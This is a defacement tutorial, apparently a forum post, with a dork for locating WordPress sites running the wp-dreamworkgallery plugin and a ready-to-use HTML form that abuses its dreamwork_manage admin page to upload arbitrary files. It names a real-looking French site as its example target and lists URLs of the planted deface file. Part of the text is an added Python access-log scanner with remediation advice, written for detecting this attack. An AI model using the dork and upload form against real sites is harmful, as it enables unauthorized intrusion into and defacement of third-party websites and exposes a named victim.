
Deface with WordPress dreamwork_manage File Upload Vulnerability

Hello friends, how are you? Straight to the tutorial..

Go straight to Google.


DORK: "inurl:/wp-content/plugins/wp-dreamworkgallery"

Pick one website.

Copy and paste this exploit into Notepad, then save it as, for example, ex.html:

<form action="http://www.target.com//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="task" value="drm_add_new_album" />
  <input type="hidden" name="album_name" value="Arbitrary File Upload" />
  <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
  <input type="file" name="album_img" value="" />
  <input type="submit" value="Submit" />
</form>

Replace www.target.com with the target site... Here is my own example target:

<form action="http://theatredumordant.fr//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="task" value="drm_add_new_album" />
  <input type="hidden" name="album_name" value="Arbitrary File Upload" />
  <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
  <input type="file" name="album_img" value="" />
  <input type="submit" value="Submit" />
</form>



It seems a shell can't be uploaded with this method, so just upload your deface file, e.g. an .html file, and then submit.



If the page looks like that, it is usually vulnerable. Now check the file we uploaded earlier. See the picture.. My file is at
/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html

So the full URL is http://theatredumordant.fr/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html
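As an added defensive example that is not part of the original post: a small Python scanner over web-server access-log lines (combined log format is assumed) that flags POSTs to the admin.php?page=dreamwork_manage endpoint shown above and requests for non-image files under /wp-content/uploads/dreamwork/, then correlates the two per client IP. The sample log lines, IP addresses and timestamps are constructed; the endpoint and upload directory are the ones named in the post.

```python
import re
from urllib.parse import parse_qs

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Plugin admin page and upload directory as they appear in the post.
ADMIN_PAGE = "dreamwork_manage"
# Anything under the plugin's upload directory that is not an image is suspicious:
# HTML pages, PHP variants, JavaScript and SVG (SVG can carry script).
UPLOAD_DIR_RE = re.compile(
    r"^/wp-content/uploads/dreamwork/.*\.(html?|php\d?|phtml|js|svg)$", re.I
)


def classify(method, target):
    """Return an indicator name for one request, or None if it looks benign."""
    raw_path, _, query = target.partition("?")
    path = re.sub(r"/{2,}", "/", raw_path)  # the post's form uses "//wp-admin"; normalise it
    params = parse_qs(query)
    if (method == "POST" and path.endswith("/wp-admin/admin.php")
            and ADMIN_PAGE in params.get("page", [])):
        return "album-upload-post"
    if UPLOAD_DIR_RE.match(path):
        return "non-image-in-upload-dir"
    return None


def scan(lines):
    """Parse access-log lines and return a list of findings (dicts)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        kind = classify(m["method"], m["target"])
        if kind:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "kind": kind,
                "target": m["target"], "status": int(m["status"]),
            })
    return findings


def correlate(findings):
    """IPs that both posted to the album endpoint and fetched a non-image
    file from the upload directory: the strongest sign of a successful upload."""
    posted = {f["ip"] for f in findings if f["kind"] == "album-upload-post"}
    fetched = {f["ip"] for f in findings
               if f["kind"] == "non-image-in-upload-dir" and 200 <= f["status"] < 300}
    return posted & fetched


# Constructed sample log (not real traffic); the third and fourth lines are benign.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "POST //wp-admin/admin.php?page=dreamwork_manage HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:45 +0000] "GET /wp-content/uploads/dreamwork/480_uploadfolder/big/x.html HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:14:01:02 +0000] "GET /wp-content/uploads/dreamwork/480_uploadfolder/big/photo.jpg HTTP/1.1" 200 40210 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:14:01:05 +0000] "GET /index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['ts']} {f['ip']} {f['kind']}: {f['target']} ({f['status']})")
    print("likely successful uploads from:", sorted(correlate(results)))
```

A POST to this admin page from a logged-in administrator is normal gallery use, so the "album-upload-post" indicator on its own is only a lead to correlate with the WordPress session; an HTML or PHP file subsequently served from the plugin's upload directory is what confirms the problem. The durable fix is on the server side: the plugin must allow-list image extensions and MIME types for album_img, and the web server should refuse to execute scripts and serve non-image types from the uploads directory, which also makes the detection above a safety net rather than the primary control.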


DEMO :

http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml
